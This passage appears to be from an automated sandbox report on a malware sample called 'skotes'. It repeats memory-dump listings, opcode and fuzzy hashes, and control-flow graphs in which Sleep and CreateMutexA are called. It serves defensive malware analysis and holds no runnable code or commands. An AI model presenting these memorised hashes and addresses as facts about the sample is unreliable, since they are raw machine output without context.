                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9519eea197813f5b0beb5f16b1185059c9105cd892bb0bec66ad649286ca954e
                                                                                                                                                                                                                                                                                          • Instruction ID: 63dac8cb9edf6eca05384fe90434567c2cfce8da32ba4ddede2d93b140a35680
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9519eea197813f5b0beb5f16b1185059c9105cd892bb0bec66ad649286ca954e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40315D317042009BEB18AB79DD897EDB762EF85330F20461DE114DB2D5D77A8980EF52

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 56 fba079-fba099 60 fba09b-fba0a7 56->60 61 fba0c7-fba0e3 56->61 62 fba0a9-fba0b7 60->62 63 fba0bd-fba0c4 call fcd663 60->63 64 fba111-fba130 61->64 65 fba0e5-fba0f1 61->65 62->63 70 fba930-fba994 call fe6c6a Sleep CreateMutexA 62->70 63->61 68 fba15e-fba916 call fc80c0 64->68 69 fba132-fba13e 64->69 66 fba0f3-fba101 65->66 67 fba107-fba10e call fcd663 65->67 66->67 66->70 67->64 74 fba140-fba14e 69->74 75 fba154-fba15b call fcd663 69->75 86 fba9a7-fba9a8 70->86 87 fba996-fba998 70->87 74->70 74->75 75->68 87->86 88 fba99a-fba9a5 87->88 88->86
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9dc76a6a9904b2bfb3b911ef50d58e26ae6bf1062a0516dc8a91f8da3064363b
                                                                                                                                                                                                                                                                                          • Instruction ID: 013108b8f1bc6fcf18b74be9eba18eefbcb5d115acac72e841b7995657bf30fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9dc76a6a9904b2bfb3b911ef50d58e26ae6bf1062a0516dc8a91f8da3064363b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76311631B001019BEB18EB7DDD89BEDB762EB81320F24421DE0149B2D5D77A9980EF56

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 90 fba1ae-fba1ce 94 fba1fc-fba218 90->94 95 fba1d0-fba1dc 90->95 98 fba21a-fba226 94->98 99 fba246-fba265 94->99 96 fba1de-fba1ec 95->96 97 fba1f2-fba1f9 call fcd663 95->97 96->97 100 fba935 96->100 97->94 102 fba228-fba236 98->102 103 fba23c-fba243 call fcd663 98->103 104 fba293-fba916 call fc80c0 99->104 105 fba267-fba273 99->105 107 fba953-fba994 Sleep CreateMutexA 100->107 108 fba935 call fe6c6a 100->108 102->100 102->103 103->99 111 fba289-fba290 call fcd663 105->111 112 fba275-fba283 105->112 119 fba9a7-fba9a8 107->119 120 fba996-fba998 107->120 108->107 111->104 112->100 112->111 120->119 122 fba99a-fba9a5 120->122 122->119
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e8acb279bb6176dc02beb7da2064080ce44f3e7c73488026d5fe8003c69c2aaf
                                                                                                                                                                                                                                                                                          • Instruction ID: 237fc088c559fc91a994037e333e4c1c9d91a1cbe8a0ba9fed88bc6021b932b9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8acb279bb6176dc02beb7da2064080ce44f3e7c73488026d5fe8003c69c2aaf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A312831B001019BEB189B7DDD89BEDB762AF86320F24421DE0149B2D5D77A8980EF16

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 124 fba418-fba438 128 fba43a-fba446 124->128 129 fba466-fba482 124->129 130 fba448-fba456 128->130 131 fba45c-fba463 call fcd663 128->131 132 fba4b0-fba4cf 129->132 133 fba484-fba490 129->133 130->131 136 fba93f-fba949 call fe6c6a * 2 130->136 131->129 134 fba4fd-fba916 call fc80c0 132->134 135 fba4d1-fba4dd 132->135 138 fba492-fba4a0 133->138 139 fba4a6-fba4ad call fcd663 133->139 140 fba4df-fba4ed 135->140 141 fba4f3-fba4fa call fcd663 135->141 155 fba94e 136->155 156 fba949 call fe6c6a 136->156 138->136 138->139 139->132 140->136 140->141 141->134 157 fba953-fba994 Sleep CreateMutexA 155->157 158 fba94e call fe6c6a 155->158 156->155 160 fba9a7-fba9a8 157->160 161 fba996-fba998 157->161 158->157 161->160 162 fba99a-fba9a5 161->162 162->160
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: db70f93e516ff63845a118d71752d1936842cedbb517f6859229ffb0cff83413
                                                                                                                                                                                                                                                                                          • Instruction ID: b1cdb3ca0128087f883bfbbc21d39ff5b1652f2812b373de23dd36a5e98f19d1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db70f93e516ff63845a118d71752d1936842cedbb517f6859229ffb0cff83413
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE311531B001409BEB18EB7DDD8DBEDB662EB81320F244218E054DB2D5D7BA8984EF56

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 164 fba54d-fba56d 168 fba59b-fba5b7 164->168 169 fba56f-fba57b 164->169 172 fba5b9-fba5c5 168->172 173 fba5e5-fba604 168->173 170 fba57d-fba58b 169->170 171 fba591-fba598 call fcd663 169->171 170->171 178 fba944-fba949 call fe6c6a 170->178 171->168 174 fba5db-fba5e2 call fcd663 172->174 175 fba5c7-fba5d5 172->175 176 fba632-fba916 call fc80c0 173->176 177 fba606-fba612 173->177 174->173 175->174 175->178 181 fba628-fba62f call fcd663 177->181 182 fba614-fba622 177->182 192 fba94e 178->192 193 fba949 call fe6c6a 178->193 181->176 182->178 182->181 194 fba953-fba994 Sleep CreateMutexA 192->194 195 fba94e call fe6c6a 192->195 193->192 198 fba9a7-fba9a8 194->198 199 fba996-fba998 194->199 195->194 199->198 200 fba99a-fba9a5 199->200 200->198
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
